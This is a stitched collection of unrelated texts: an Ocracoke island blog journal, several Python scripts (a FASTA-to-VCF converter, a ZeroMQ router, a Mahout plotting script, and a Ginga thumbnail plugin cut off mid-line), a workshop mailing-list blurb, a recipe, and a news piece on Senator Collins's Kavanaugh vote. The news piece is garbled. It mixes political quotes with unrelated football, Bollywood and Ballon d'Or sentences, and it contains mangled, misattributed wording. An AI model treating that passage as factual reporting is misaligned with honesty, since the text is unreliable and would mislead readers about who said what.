was bright and sunny again. Every morning, when I turn on the water in my outdoor shower, my tiny green neighbor who hangs out behind the shampoo bottle, starts a-croaking. He's a friendly fellow, and I enjoy his early morning singing. And, of course, streets & shops bustling with visitors. Is bare now, nor can foot feel, being shod." I think of this poem often when I walk along the beach barefooted. To be sure, the village of Ocracoke, like so many places, is constantly threatened by development. As beautiful as it can be, it also "wears man's smudge" so to speak. But Ocracoke still retains a vibrant sense of community, a strong connection with it's 275 year old history, and is a tranquil respite from so much of the rest of the modern world. And as I stroll barefooted along our pristine 16 miles of undeveloped beach I know that here is one place where foot can feel. The water is cool, the sand soft under my feet. At places I feel the rough "gravel" of thousands of tiny, broken pieces of shell. Elsewhere I feel the silky, fine grains of sand push up between my toes. Sometimes the sand is searingly hot. It burns at the bottom of my "winter feet." I find relief in the shade of a cedar tree along the path that leads back to the road. Today I avoid the "pickle pears" that line the path, but I encounter a lone sand spur that lodges under my big toe. I still can feel the earth under my feet. There lives the dearest freshness deep down things." Temperatures are expected to be in the low 80's again today under sunny skies. Chance of rain is a slight 20%. But the price is wilting plants and parched lawns. Island visitors continue to enjoy the pleasant weather and warming ocean. Imagine walking down a narrow path, through wax myrtles, yaupons, and cedars. The path opens into an open sandy expanse where prickly pear cacti (referred to on the island as "pickle pears") are just beginning to open up into bright yellow flowers. Through breaks in the dunes you can see the ocean sparkling in the distance. Once on the beach the water is divided into three distinct hues -- darker and slightly murky near shore where the breakers churn up sand from the bottom, deep rich blue at the horizon, and a magnificent aquamarine (almost emerald) color just beyond the breakers. Such a view I had this afternoon on my daily walk along the shore and dip in the cooling water. -- graceful dolphin fins cutting through the water close enough to shore that it wouldn't be very difficult to swim out to them. The days have been so beautiful for so long that inside work just piles up, neglected. Oh well....., I guess that's one disadvantage of living in a great community just minutes from one of the best beaches in the United States. Congratulations to all the Spring graduates out there. Don't forget your trip to the island this summer. Everyone needs time to "wind down" now and then, and Ocracoke is the perfect place for that. The tide was low late this morning as I walked along the surf, and dolphins were swimming just beyond the breakers. The water is still cool, but incredibly refreshing, especially since the temperature is in the mid-80's. It's beginning to feel like summer on the island. Not so many visitors yet, but the temperature is in the 80's today, under bright, clear skies. Folks are already enjoying ocean swimming, as well as biking, kayaking, & sailing. In case you don't know about the Ocrafolk Festival coming up the first weekend in June, click here for information, and make plans now to join us for a wonderful weekend of music and storytelling. Although there aren't as many gardens on the island today as there were in years gone by, gardens have always been a major part of life on Ocracoke. In other news, tonight is the annual pot luck dinner and general membership meeting of the Ocracoke Preservation Society. We recommend that you stop by the museum on your next visit to the island. You can learn a lot about island life & the history of Ocracoke (and your donation, large or small, will help preserve our island heritage!). Ocracoke is a wonderful place to live, and definitely no longer as isolated as it once was. Today 7 Buddhist monks from Thailand visited the island and offered a meditation/blessing on the deck at Thai Moon restaurant. Certainly an Ocracoke experience my grandparents never had! A special greeting to Snee (my daughter-in-law), the mother of Zoe, Eakin, & Eliza; and to Amy (my daughter), the soon-to-be-mother of my fourth grandchild. These younguns are the 10th generation of our island family. It's a quiet day on Ocracoke -- the perfect opportunity to relax, work in the garden, take a dip in the ocean, or lie in the hammock and read a good book. No community meetings, or other responsibilities, and the temperature is in the mid-70's again, under clear skies. Island life is pretty wonderful! It's another beautiful Spring day, with temperatures in the 70's, bright skies, and a light breeze. Ocracoke Preservation Museum's featured 2004 exhibit includes paintings & sketches by JoKo, well-known Outer Banks artist of the last half of the 20th century. Some of you may remember when JoKo spent much of his summers on Ocracoke in the 1960's through the 1980's. The Museum's off-season hours are Monday - Saturday, 10 - 4. Today at 11 am the British War Graves Commission and the US Coast Guard will hold their annual memorial service at Ocracoke's British Cemetery. Between January and July, 1942 nearly 400 ships, mostly merchant vessels, were sunk or damaged by German U-boats. About 5000 people were killed or injured. The British Cemetery is the site of four graves of seamen whose bodies washed ashore on Ocracoke's beach in May of 1942 -- Lt Thomas Cunninglham, Stanley R. Craig, AB, and two unknown sailors. All were from the ill-fated British ship, HMS Bedfordshire. Three photos from today's lighthouse "open house (see the earlier post today for an explanation):" Visitors to the island often ask if they can climb the lighthouse. Unfortunately, this is not allowed. There are, of course, good reasons for this. -- The lighthouse (built in 1823) is more than 180 years old. -- The final 8 feet of the climb is by means of a narrow, steep ladder. -- The access to the light is nothing more than a hatch in the floor. -- The light & the fresnel lens take up most of the space at the top of the tower, leaving little room for visitors. -- The door onto the balcony is only about 4 feet high. -- The railing around the balcony was not designed to keep toddlers or small children from slipping off the edge. In short, the Ocracoke lighthouse was designed for a lighthouse keeper, not for visitors. However, on special occasions (most notably, July 4) the base of the lighthouse is often opened to the public by the National Park Service. Today, between 10 am and 3 pm, the lighthouse will also be open for public viewing. Gail Fox, one of our newer rangers, realized that many local residents had never been inside the lighthouse (most islanders work all day on the 4th of July). So she arranged to have the door open today for the general public, and especially for Ocracokers. Many thanks to Gail for her thoughtful consideration. Another beautiful, but cool, Spring day. It's cooler today (in the upper 50's) and breezy, but sunny and beautiful, after a bit of rain yesterday. We published our latest Ocracoke Newsletter yesterday, the story of aviation and Ocracoke Island. The Newsletter also has information about Phil Platt's new air service connecting the island with Norfolk, Virginia and New Bern, North Carolina. To read the Newsletter just click here. Today, tomorrow, and Wednesday are important days for island residents. A driver's license & vehicle registration card with an Ocracoke address will entitle islanders to a renewed Hatteras Inlet ferry priority pass. There may be times when you are waiting in line for an hour or more in the sweltering summer heat, hoping to board the next ferry, only to see someone pull up in the priority lane and be loaded before you are. As frustrating as this can be, please understand how it was for island residents before priority passes were isssued. I remember well how difficult it was to spend 7 or 8 hours making a round trip to the dentist, and then to sit for several hours waiting in line just to get home. It's even harder on elderly residents and small children, especially if they're coming home from a doctor's appointment, or even the hospital. Because so much of our "routine business" (clothes shopping, appointments with eye doctors, a trip to a large convenience store, grocery shopping, certain automobile repairs, school basketball games, jury duty, etc,) entails lengthy round trips "off-island" we are all thankful for this small concession to our local needs. The Ocracoke Journal resumes today. I'm home again, after spending a week in Indiana visiting a dear friend who had eye surgery. She is doing well and looking forward to enjoying the summer on Ocracoke. Her eye patch will be stashed away by then, but maybe she'll bring it out now and then in remembrance of Anne Bonney, Mary Reed, and assorted other pirates. I arrived home yesterday to discover everything outdoors covered with oak leaves (live oaks shed in the Spring, not the Fall) and debris from polinating cedar trees. It's quite a mess, and there's occasional light rain, but the days are warm and pleasant (Indiana was beautiful, but it actually snowed there last week!).
#!/usr/bin/env python """Updated version of VCF_from_FASTA.py that hopefully will simplify the process of generating a VCF from Sanger reads aligned to a reference sequence. Requires Biopython. Assumes the reference sequence is the first one in the alignment. Takes one argument: 1) FASTA multiple sequence alignment""" import sys import re from datetime import date try: from Bio import SeqIO fa_in = sys.argv[1] except ImportError: sys.stderr.write('This script requires Biopython.\n') sys.exit(1) except IndexError: sys.stderr.write(__doc__ + '\n') sys.exit(2) def extract_ref_coords(alignment, ref_idx=0): """Extract the name and the coordinates from the reference sequence of the alignment. This expects the sequence to be named in SAM/BED region format.""" ref = alignment[ref_idx] chrom = ref.name.split(':')[0] start = ref.name.split(':')[1].split('-')[0] return (chrom, start) def check_ref_gaps(alignment, ref_idx=0): """Check the reference sequence for end gaps. If we find any end gaps on the left, we will throw an error because we cannot accurately calculate the positions relative to reference. If we find them on the right, we will throw a warning, but continue anyway.""" ref = alignment[ref_idx] refseq = str(ref.seq) left_gap = re.compile(r'^-+[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]') right_gap = re.compile(r'[ACGTMRWSYKVHDBNacgtmrwsykvhdbn]-+$') if left_gap.match(refseq): sys.stderr.write( """Error: Reference sequence has end-gaps on the left. This will cause calculated positions to be incorrect. Please remove the end gaps and re-run this script. """) sys.exit(10) if right_gap.search(refseq): sys.stderr.write( """Warning: reference sequence has end-gaps on the right. This is not an error, but some of the variants at the end of the alignment will not be placed on the reference sequence. You may either remove the right end-gap or remove the variants from the resulting VCF that occur in the end-gap.\n""") return def check_columns(alignment, ref_idx=0): """Check all of the columns of the alignment for those that are all gaps or all N. Print a list of indices if it finds any.""" no_data = [] raw_aln = [list(s.seq) for s in alignment] # Transpose it t_aln = zip(*raw_aln) refpos = 0 for index, column in enumerate(t_aln): ref_base = column[ref_idx] # Calculate the states that are present in this column states = {s.upper() for s in column} # Throw out gaps and Ns states.discard('-') states.discard('N') # If there are no states left, then we append it to the list if not states: no_data.append((refpos+1, index+1)) if ref_base != '-': refpos += 1 # Now, if no_data has values in it, then we will print them out here if no_data: message = """The following positions (1-based) were found to be either all gaps or all N in your alignment: {refpos} in the reference sequence, or {alnpos} in the aligned sequences.\n""".format( refpos=', '.join([str(i[0]) for i in no_data]), alnpos=', '.join([str(i[1]) for i in no_data])) sys.stderr.write(message) sys.exit(2) return def extract_variants(alignment, ref_idx=0): """Extract the positions of SNPs and indels in the Sanger reads aligned to the reference sequence.""" snp_pos = [] indel_pos = [] # First, convert the alignment to a list of lists, as opposed to a list # of SeqRecord objects raw_aln = [list(s.seq) for s in alignment] # Transpose it so that we iterate over columns of the alignment t_raw_aln = zip(*raw_aln) # Start iterating across columns and saving positions of variant sites. We # keep track of the reference base and only increment the position counter # for when we see a non-gap character in the reference sequence. offset = 0 for aln_pos, aln_column in enumerate(t_raw_aln): # First, get the states that exist at this position. Transform them # all to uppercase characters. upper_col = [s.upper() for s in aln_column] states = set(upper_col) # Discard any 'N' bases states.discard('N') # And get the ref state ref_state = aln_column[ref_idx] # Use the ref state to get the alternate states alt_states = states - set(ref_state) # If there is a gap in this position, then we will append it to the # list of indel positions if '-' in states: indel_pos.append((offset, aln_pos, ref_state, alt_states)) # Then, discard the gap character to look for SNPs states.discard('-') # If the length of the states is greater than 1, then we have a SNP if len(states) > 1: # We will calculate the following: # Number of non-missing alleles # Minor allele count # Minor allele frequency # The reference IS included in these calculations. non_missing = [ base for base in aln_column if base != '-' or base != 'N'] acs = [aln_column.count(x) for x in states] afs = [float(c)/len(non_missing) for c in acs] # Re-discard the gap character, just to be sure we do not count it # as an alternate state alt_states.discard('-') snp_pos.append( (offset, ref_state, alt_states, len(non_missing), min(acs), min(afs))) # If the reference sequence is not a gap, then we increment our offset # counter. if ref_state != '-': offset += 1 return (snp_pos, indel_pos) def collapse_indels(indels): """Collapse indels by identifying runs of consecutive integers and merging those into a single entry.""" # Sort the indel bases by their aligned position indel_srt = sorted(indels, key=lambda x: x[1]) # Make a list to hold our aggregated indels agg_indel = [] # We will now iterate over adjacent records - if they are consecutive, then # merge them. Else, break it and start a new record. curr_indel = [] for ind, ind_adj in zip(indel_srt, indel_srt[1:]): # Unpack the alleles. It's a little silly, but we have to cast the set # to a list to subset it. curr_ref = ind[2] curr_alt = list(ind[3])[0] adj_ref = ind_adj[2] adj_alt = list(ind_adj[3])[0] if not curr_indel: curr_indel = [ind[0], ind[1], curr_ref, curr_alt] # If the next position is not consecutive, append it and start over if ind_adj[0] - ind[0] > 1: agg_indel.append(curr_indel) curr_indel = [ind_adj[0], ind_adj[1], adj_ref, adj_alt] else: curr_indel[2] += adj_ref curr_indel[3] += adj_alt # The way we are iterating through the indel list means that we will always # leave off the last one. Append it after the loop finishes. agg_indel.append(curr_indel) return agg_indel def adjust_indels(indels, alignment, ref_idx=0): """Adjust the indel positions so that they are offset by one, as required by the VCF spec. This is because the reported position must be the base *before* any insertion/deletion polymorphism is observed.""" spec_indels = [] # Remove the gaps from the reference sequnce for getting the reference base # of the indel ref_seq = ''.join([base for base in alignment[ref_idx].seq if base != '-']) for i in indels: spec_pos = i[0] - 1 spec_ref = ref_seq[spec_pos] spec_indel = [spec_pos, spec_ref + i[2], spec_ref + i[3]] spec_indels.append(spec_indel) return spec_indels def print_vcf(snp_var, ind_var, refseq, offset): """Print a VCF from the calculated positions of the variants.""" # Define the VCF header today = date.today().strftime('%Y%m%d') vcf_header = """##fileformat=VCFv4.1 ##fileDate={filedate} ##source=VCF_from_FASTA_2.py;Morrell Lab @ UMN ##INFO=<ID=MAC,Number=1,Type=Integer,Description="Minor allele count"> ##INFO=<ID=MAF,Number=1,Type=Float,Description="Minor allele frequency"> ##INFO=<ID=NS,Number=1,Type=Integer,Description="Number of samples with data"> ##INFO=<ID=SNP,Number=0,Type=Flag,Description="Variant is a SNP"> ##INFO=<ID=INDEL,Number=0,Type=Flag,Description="Variant is an INDEL"> #CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO""".format(filedate=today) print(vcf_header) # Sort the SNPs and indels by their offset and print the records srt_variants = sorted(snp_var + ind_var, key=lambda x: x[0]) for v in srt_variants: # Set the chromosome and position: add 1 to account for 1-based nature # of VCF v_chr = refseq v_pos = str(int(offset) + v[0] + 1) v_id = '.' v_qual = '40' v_filter = '.' # This is a bit of a hack, but if we have more than three fields, then # the variant type is a SNP if len(v) > 3: # We also have to replace gap characters with N for the reference # allele in the cases where a SNP occurs in a gapped part of the # reference. v_ref = v[1].replace('-', 'N') # A bit ugly, but we have to cast the alt alleles from set to list v_alt = ','.join(list(v[2])) v_info = ';'.join([ 'MAC=' + str(v[4]), 'MAF=' + str(v[5]), 'NS=' + str(v[3]), 'SNP']) else: # Replace the gap characters with N v_ref = v[1].replace('-', 'N') v_alt = v[2].replace('-', 'N') v_info = 'INDEL' # Print the line print('\t'.join([ v_chr, v_pos, v_id, v_ref, v_alt, v_qual, v_filter, v_info])) return def main(fasta): """Main function.""" # Store the alignment object as a list aln = list(SeqIO.parse(fasta, 'fasta')) # Extract the chromosome name and start position from the name of the # reference sequence. chrom, start = extract_ref_coords(aln) # We should check the reference sequence, too. If there are end-gaps on the # reference sequence, then we can't accurately calculate positions in the # alignment. check_ref_gaps(aln) # Also check for aligned positions that are all N or all gaps check_columns(aln) snps, indels = extract_variants(aln) # Next, we want to collapse indels. We can find these by identifying runs # of consecutive integers in the list of indels. Some of the variants that # are in the list of indels are SNPs that occur within sequences that are # also part of a length polymorphism. We can just treat them as indels for # this routine. c_indels = collapse_indels(indels) # We also have to adjust the indels: the VCF spec requires that the # position of the indel be the base *before* the length polymorphism a_indels = adjust_indels(c_indels, aln) # Then, print the VCF! print_vcf(snps, a_indels, chrom, start) return main(fa_in)
Get involved with Safety First! Join our mailing list to hear about upcoming trainings, office hours, and other events! Email us sfp at stumptownsyndicate dot org to find out how to schedule a workshop. We recommend scheduling incident response training about one month before your event is scheduled to take place. Follow our github repository for this site on GitHub and help us to make it better. Our materials are open source.
#!/usr/bin/env python3 """ Created on January 9 11:39:15 2016 @author: Alan Yorinks Copyright (c) 2016 Alan Yorinks All right reserved. This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 3 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA """ import os import signal import socket import sys import time import zmq from xideco.data_files.port_map import port_map # noinspection PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences,PyUnresolvedReferences class XidecoRouter: """ This class consists of a PAIR connection to a control program bridge (i.e. - HTTP for Scratch), creates a publisher for Scratch commands, and creates a set of subscribers to listen for board data changes. """ def __init__(self): """ This is the constructor for the XidecoRouter class. :param: use_port_map: If true, use the ip address in the port map, if false, use discovered ip address :return: None """ # figure out the IP address of the router s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # use the google dns s.connect(('8.8.8.8', 0)) self.ip_addr = s.getsockname()[0] # identify the router ip address for the user on the console print('\nXideco Router - xirt') print('\n******************************************') print('Using router IP address = ' + self.ip_addr) print('******************************************') # find the path to the data files needed for operation path = sys.path self.base_path = None # get the prefix prefix = sys.prefix for p in path: # make sure the prefix is in the path to avoid false positives if prefix in p: # look for the configuration directory s_path = p + '/xideco/data_files/configuration' if os.path.isdir(s_path): # found it, set the base path self.base_path = p + '/xideco' break if not self.base_path: print('Cannot locate xideco configuration directory.') sys.exit(0) print('\nIf using the port map, port_map.py is located at:\n') print(self.base_path + '/data_files/port_map\n') print('NOTE: The path to port_map.py may be different') print('for each Operating System/Computer.') print('\nSet the router_ip_address entry in port_map.py ') print('to the address printed above for each ') print('computer running Xideco, or optionally ') print('set the address manually for each Xideco module') print('using the command line options.\n') self.router = zmq.Context() # establish router as a ZMQ FORWARDER Device # subscribe to any message that any entity publishes self.publish_to_router = self.router.socket(zmq.SUB) bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[ 'publish_to_router_port'] self.publish_to_router.bind(bind_string) # Don't filter any incoming messages, just pass them through self.publish_to_router.setsockopt_string(zmq.SUBSCRIBE, '') # publish these messages self.subscribe_to_router = self.router.socket(zmq.PUB) bind_string = 'tcp://' + self.ip_addr + ':' + port_map.port_map[ 'subscribe_to_router_port'] self.subscribe_to_router.bind(bind_string) zmq.device(zmq.FORWARDER, self.publish_to_router, self.subscribe_to_router) # noinspection PyMethodMayBeStatic def route(self): """ This method runs in a forever loop. :return: """ while True: try: time.sleep(.001) except KeyboardInterrupt: sys.exit(0) def clean_up(self): self.publish_to_router.close() self.subscribe_to_router.close() self.router.term() def xideco_router(): # noinspection PyShadowingNames xideco_router = XidecoRouter() xideco_router.route() # signal handler function called when Control-C occurs # noinspection PyShadowingNames,PyUnusedLocal,PyUnusedLocal def signal_handler(signal, frame): print('Control-C detected. See you soon.') xideco_router.clean_up() sys.exit(0) # listen for SIGINT signal.signal(signal.SIGINT, signal_handler) signal.signal(signal.SIGTERM, signal_handler) # Instantiate the router and start the route loop if __name__ == '__main__': xideco_router()
When Sen. Susan Collins announced, on Friday, October 5, that she would be voting "yes" on Brett M. Kavanaugh's confirmation to the U.S. Supreme Court, the four-term senator from ME went out of her way to convince Kavanaugh's detractors that he wasn't almost the far-right extremist they thought he was. The Senate voted to confirm Kavanaugh to the nation's highest court with a 50-48 vote Saturday, and he was sworn in a few hours later. Susan Collins (R-Maine) on Monday claimed she's received a positive response to her decision to back the right-wing extremist. "Me", Rice responded. Psaki said any Collins opponent would be "well-funded". "I think the online crowd fundraising effort is the equivalent of trying to bribe me to take a particular position". But they do lead me to conclude that the allegations failed to me the more-likely-than-not standard. Essentially they were proposing a quid pro quo. Here are five things that Collins got horribly wrong when came out in support of Kavanaugh's confirmation. "It's certainly been a hard situation", Collins told the TV station. "Senator Collins will be well-funded [too], I can assure you", McConnell said. Hirono was not alone in her concerns about Collins' speech on the Senate floor on Friday and the decision to vote for Kavanaugh. Some critics have claimed Collins has refused to meet with sexual assault survivors. "As I watch numerous Senators speak and vote on the floor of the Senate I feel like I'm right back at Yale where half the room is laughing and looking the other way". President Donald Trump, on board Air Force One, gestures while watching a live television broadcast of the Senate confirmation vote of Supreme Court nominee Brett Kavanaugh, Oct. 6, 2018. Echoing Trump, Collins raised questions about the account of Christine Blasey Ford, who alleged that Kavanaugh drunkenly pinned her to a bed, groped her and put his hand over her mouth to stifle her screams as he tried to take off her clothes at a gathering at a house in the early 1980s. Pelley initiated the conversation with Collins and said: 'There are many who believe that judge Kavanuagh will be the vote that results in abortion becoming illegal in the United States. and I wonder if you are concerned about that?' "I can not conclude, based on the evidence and the complete lack of corroboration that Brett Kavanaugh was her assailant". Kavanaugh has denied all allegations. Collins said confidently that she is not concerned - and admitted she "could not vote for a judge who had demonstrated hostility to Roe v. Wade" - adding that it would 'indicate a lack of respect for precedent'. In Washington, President Donald Trump said today that he thought Collins was "incredible" and that she "gave an impassioned, lovely speech". I mean, that is so devastating. But, I will say that I thought his questioning, with the questioning with the senators, that he went over the line. So I think it was understandable that he was reacting as a human being, as a father, as a father of two young girls. But Smith's teammate, Henry Ruggs III, was there to pick it up at the 12 and took it in for the touchdown. After forcing a fumble on the Razorbacks first possession, Alabama got the ball back. All I have to say is, if something like this happens to any girl, in any industry, she must speak up and take a charge. Patekar has denied the allegations and had sent Dutta a legal notice to withdraw the claims and issue an apology. He already owns records for career completion percentage (67.1-percent), passing yards per game (342.3), and consecutive seasons of 4,500 yards (7). Obviously a win at Anfield would have been a huge psychological boost for his team, but a 0-0 draw is still a positive result. We tried to win but at the end we need to be happy - I need to be happy - that we didn't lose it because of the penalty. Wales forward Gareth Bale and England striker Harry Kane are among the nominees for the 2018 Ballon d'Or , BBC Sport reports. Kylian Mbappe is third-favourite after winning the World Cup with France at the age of 19, with 6-1 odds.
__author__ = 'cmantas' from tools import * from json import loads ms = take_single("select metrics from mahout_kmeans_text where k=15 and documents=90300 and dimensions=53235;")[0] mj = loads(ms) cols = iter(["#727272", '#f1595f', '#79c36a', '#599ad3', '#f9a65a','#9e66ab','#cd7058', '#d77fb3']) def timeline2vaslues(fieldname, metrics): times =[] values =[] for k,v in metrics: times.append(k) values.append(v[fieldname]) return times, values def sum_timeline_vals(fieldnames, metrics): times =[] values =[] for k,v in metrics: times.append(k) sum = 0 for i in fieldnames: if i.startswith("kbps"): v[i]=int(v[i]) sum += v[i] values.append(sum) return times, values # figure() fig, ax1 = plt.subplots() times, values = timeline2vaslues("cpu", mj) d, = ax1.plot(times, values, color=next(cols)) ax1.set_ylabel('percentage (%)') times, values = timeline2vaslues("mem", mj) a, = ax1.plot(times, values, color=next(cols)) ax2 = ax1.twinx() times, values = sum_timeline_vals(["kbps_read", "kbps_write"], mj) ax2.set_ylabel("KB/s") b, = ax2.plot(times, values, color=next(cols)) times, values = sum_timeline_vals(["net_in", "net_out"], mj) c, = ax2.plot(times, values, color=next(cols)) plt.title("Mahout K-means Cluster Metrics") plt.legend([d, a, b,c], ["CPU", "MEM", "Disk IO", "Net IO"], loc=3) show()
Stir soymilk (or other milk)sal, oats, syrup, chia, powdered peanut butter and salt together in a 2-cup mason jar. Refrigerate overnight. Serve topped with banana or berries. So easy to make and satisfyingly tasty in the morning!! Delicious and satisfying. I pop my jar in the micro for 1 minute and enjoy a warm healthy start to my morning. Sometimes I'll add a dollop of Greek yogurt and honey!
# # Thumbs.py -- Thumbnail plugin for fits viewer # # Eric Jeschke (eric@naoj.org) # # Copyright (c) Eric R. Jeschke. All rights reserved. # This is open-source software licensed under a BSD license. # Please see the file LICENSE.txt for details. # from ginga.gtkw import FitsImageGtk as FitsImageGtk from ginga import GingaPlugin import os import time import hashlib import gtk import gobject from ginga.misc import Bunch class Thumbs(GingaPlugin.GlobalPlugin): def __init__(self, fv): # superclass defines some variables for us, like logger super(Thumbs, self).__init__(fv) # For thumbnail pane self.thumbDict = {} self.thumbList = [] self.thumbRowList = [] self.thumbNumRows = 20 self.thumbNumCols = 1 self.thumbColCount = 0 # distance in pixels between thumbs self.thumbSep = 15 # max length of thumb on the long side self.thumbWidth = 150 prefs = self.fv.get_preferences() self.settings = prefs.createCategory('plugin_Thumbs') self.settings.load() self.thmbtask = None self.lagtime = 4000 self.keywords = ['OBJECT', 'FRAMEID', 'UT', 'DATE-OBS'] fv.set_callback('add-image', self.add_image) fv.set_callback('add-channel', self.add_channel) fv.set_callback('delete-channel', self.delete_channel) fv.add_callback('active-image', self.focus_cb) def build_gui(self, container): width, height = 300, 300 cm, im = self.fv.cm, self.fv.im tg = FitsImageGtk.FitsImageGtk(logger=self.logger) tg.configure(200, 200) tg.enable_autozoom('on') tg.enable_autocuts('on') tg.enable_auto_orient(True) tg.set_makebg(False) self.thumb_generator = tg sw = gtk.ScrolledWindow() sw.set_border_width(2) sw.set_policy(gtk.POLICY_AUTOMATIC, gtk.POLICY_AUTOMATIC) # Create thumbnails pane vbox = gtk.VBox(spacing=14) vbox.set_border_width(4) self.w.thumbs = vbox sw.add_with_viewport(vbox) sw.show_all() self.w.thumbs_scroll = sw self.w.thumbs_scroll.connect("size_allocate", self.thumbpane_resized) #nb.connect("size_allocate", self.thumbpane_resized) # TODO: should this even have it's own scrolled window? container.pack_start(sw, fill=True, expand=True) def add_image(self, viewer, chname, image): noname = 'Noname' + str(time.time()) name = image.get('name', noname) path = image.get('path', None) if path != None: path = os.path.abspath(path) thumbname = name if '.' in thumbname: thumbname = thumbname.split('.')[0] self.logger.debug("making thumb for %s" % (thumbname)) # Is there a preference set to avoid making thumbnails? chinfo = self.fv.get_channelInfo(chname) prefs = chinfo.prefs if not prefs.get('genthumb', False): return # Is this thumbnail already in the list? # NOTE: does not handle two separate images with the same name # in the same channel thumbkey = (chname.lower(), path) if self.thumbDict.has_key(thumbkey): return #data = image.get_data() # Get metadata for mouse-over tooltip header = image.get_header() metadata = {} for kwd in self.keywords: metadata[kwd] = header.get(kwd, 'N/A') #self.thumb_generator.set_data(data) self.thumb_generator.set_image(image) self.copy_attrs(chinfo.fitsimage) imgwin = self.thumb_generator.get_image_as_widget() imgwin.set_property("has-tooltip", True) imgwin.connect("query-tooltip", self._mktt(thumbkey, name, metadata)) self.insert_thumbnail(imgwin, thumbkey, thumbname, chname, name, path) def _mktt(self, thumbkey, name, metadata): return lambda tw, x, y, kbmode, ttw: self.query_thumb(thumbkey, name, metadata, x, y, ttw) def insert_thumbnail(self, imgwin, thumbkey, thumbname, chname, name, path): vbox = gtk.VBox(spacing=0) vbox.pack_start(gtk.Label(thumbname), expand=False, fill=False, padding=0) evbox = gtk.EventBox() evbox.add(imgwin) evbox.connect("button-press-event", lambda w, e: self.fv.switch_name(chname, name, path=path)) vbox.pack_start(evbox, expand=False, fill=False) vbox.show_all() bnch = Bunch.Bunch(widget=vbox, evbox=evbox) if self.thumbColCount == 0: hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep) self.w.thumbs.pack_start(hbox) self.thumbRowList.append(hbox) else: hbox = self.thumbRowList[-1] hbox.pack_start(bnch.widget) self.thumbColCount = (self.thumbColCount + 1) % self.thumbNumCols self.w.thumbs.show_all() self.thumbDict[thumbkey] = bnch self.thumbList.append(thumbkey) # force scroll to bottom of thumbs # adj_w = self.w.thumbs_scroll.get_vadjustment() # max = adj_w.get_upper() # adj_w.set_value(max) self.logger.debug("added thumb for %s" % (thumbname)) def reorder_thumbs(self): # Remove old rows for hbox in self.thumbRowList: children = hbox.get_children() for child in children: hbox.remove(child) self.w.thumbs.remove(hbox) # Add thumbs back in by rows self.thumbRowList = [] colCount = 0 hbox = None for thumbkey in self.thumbList: self.logger.debug("adding thumb for %s" % (str(thumbkey))) chname, name = thumbkey bnch = self.thumbDict[thumbkey] if colCount == 0: hbox = gtk.HBox(homogeneous=True, spacing=self.thumbSep) hbox.show() self.w.thumbs.pack_start(hbox) self.thumbRowList.append(hbox) hbox.pack_start(bnch.widget) hbox.show_all() colCount = (colCount + 1) % self.thumbNumCols self.thumbColCount = colCount self.w.thumbs.show_all() def update_thumbs(self, nameList): # Remove old thumbs that are not in the dataset invalid = set(self.thumbList) - set(nameList) if len(invalid) > 0: for thumbkey in invalid: self.thumbList.remove(thumbkey) del self.thumbDict[thumbkey] self.reorder_thumbs() def thumbpane_resized(self, widget, allocation): x, y, width, height = self.w.thumbs_scroll.get_allocation() self.logger.debug("reordering thumbs width=%d" % (width)) cols = max(1, width // (self.thumbWidth + self.thumbSep)) if self.thumbNumCols == cols: # If we have not actually changed the possible number of columns # then don't do anything return False self.logger.debug("column count is now %d" % (cols)) self.thumbNumCols = cols self.reorder_thumbs() return False def query_thumb(self, thumbkey, name, metadata, x, y, ttw): objtext = 'Object: UNKNOWN' try: objtext = 'Object: ' + metadata['OBJECT'] except Exception, e: self.logger.error("Couldn't determine OBJECT name: %s" % str(e)) uttext = 'UT: UNKNOWN' try: uttext = 'UT: ' + metadata['UT'] except Exception, e: self.logger.error("Couldn't determine UT: %s" % str(e)) chname, path = thumbkey s = "%s\n%s\n%s\n%s" % (chname, name, objtext, uttext) ttw.set_text(s) return True def clear(self): self.thumbList = [] self.thumbDict = {} self.reorder_thumbs() def add_channel(self, viewer, chinfo): """Called when a channel is added from the main interface. Parameter is chinfo (a bunch).""" fitsimage = chinfo.fitsimage fitsimage.add_callback('cut-set', self.cutset_cb) fitsimage.add_callback('transform', self.transform_cb) rgbmap = fitsimage.get_rgbmap() rgbmap.add_callback('changed', self.rgbmap_cb, fitsimage) def focus_cb(self, viewer, fitsimage): # Reflect transforms, colormap, etc. #self.copy_attrs(fitsimage) self.redo_delay(fitsimage) def transform_cb(self, fitsimage): self.redo_delay(fitsimage) return True def cutset_cb(self, fitsimage, loval, hival): self.redo_delay(fitsimage) return True def rgbmap_cb(self, rgbmap, fitsimage): # color mapping has changed in some way self.redo_delay(fitsimage) return True def copy_attrs(self, fitsimage): # Reflect transforms, colormap, etc. fitsimage.copy_attributes(self.thumb_generator, ['transforms', 'cutlevels', 'rgbmap'], redraw=False) def redo_delay(self, fitsimage): # Delay regeneration of thumbnail until most changes have propagated if self.thmbtask != None: gobject.source_remove(self.thmbtask) self.thmbtask = gobject.timeout_add(self.lagtime, self.redo_thumbnail, fitsimage) return True def redo_thumbnail(self, fitsimage, save_thumb=None): self.logger.debug("redoing thumbnail...") # Get the thumbnail image image = fitsimage.get_image() if image == None: return if save_thumb == None: save_thumb = self.settings.get('cacheThumbs', False) chname = self.fv.get_channelName(fitsimage) # Get metadata for mouse-over tooltip header = image.get_header() metadata = {} for kwd in self.keywords: metadata[kwd] = header.get(kwd, 'N/A') # Look up our version of the thumb name = image.get('name', None) path = image.get('path', None) if path == None: return path = os.path.abspath(path) try: thumbkey = (chname, path) bnch = self.thumbDict[thumbkey] except KeyError: return # Generate new thumbnail # TODO: Can't use set_image() because we will override the saved # cuts settings...should look into fixing this... ## timage = self.thumb_generator.get_image() ## if timage != image: ## self.thumb_generator.set_image(image) #data = image.get_data() #self.thumb_generator.set_data(data) self.thumb_generator.set_image(image) fitsimage.copy_attributes(self.thumb_generator, ['transforms', 'cutlevels', 'rgbmap'], redraw=False) # Save a thumbnail for future browsing if save_thumb: thumbpath = 